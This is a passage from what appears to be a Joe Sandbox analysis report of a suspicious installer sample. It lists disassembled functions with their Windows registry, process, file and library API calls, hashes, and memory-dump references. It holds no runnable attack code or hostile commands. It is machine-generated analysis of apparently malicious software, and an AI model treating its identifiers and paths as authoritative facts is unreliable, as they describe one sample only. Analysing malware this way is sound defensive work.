                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                                            • API String ID: 1892508949-1034134010
                                                                                            • Opcode ID: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                                                                            • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                                            • Opcode Fuzzy Hash: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                                                                            • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                                            Function 00406165 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063D9,80000002), ref: 004061AB
                                                                                            • RegCloseKey.KERNELBASE(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,halituses), ref: 004061B6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID: : Completed
                                                                                            • API String ID: 3356406503-2954849223
                                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                            • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                            • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                                            Function 00405880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                                            • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                                            Strings
                                                                                            • Error launching installer, xrefs: 00405893
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID: Error launching installer
                                                                                            • API String ID: 3712363035-66219284
                                                                                            • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                            • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                                            • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                            • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                                            Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                              • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,762323A0), ref: 0040535A
                                                                                              • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 334405425-0
                                                                                            • Opcode ID: 7a25ddf71574e17a44a7b6d6d2d8623a607b9bc29b791e8d98a732f6a3ef313a
                                                                                            • Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
                                                                                            • Opcode Fuzzy Hash: 7a25ddf71574e17a44a7b6d6d2d8623a607b9bc29b791e8d98a732f6a3ef313a
                                                                                            • Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A
                                                                                            Function 004023E4 Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValuelstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2655323295-0
                                                                                            • Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                                                                            • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                                            • Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                                                                            • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                                            Function 00402259 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 004065E5
                                                                                              • Part of subcall function 004065DA: FindClose.KERNEL32(00000000), ref: 004065F1
                                                                                            • lstrlenW.KERNEL32 ref: 00402299
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                            • String ID:
                                                                                            • API String ID: 1486964399-0
                                                                                            • Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                                                                            • Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
                                                                                            • Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                                                                            • Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59
                                                                                            Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Enum$CloseValue
                                                                                            • String ID:
                                                                                            • API String ID: 397863658-0
                                                                                            • Opcode ID: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                                                                            • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                                            • Opcode Fuzzy Hash: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                                                                            • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                                            Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3356406503-0
                                                                                            • Opcode ID: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                                                                            • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                                            • Opcode Fuzzy Hash: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                                                                            • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                            • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                            • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                            • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                            Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023B0
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
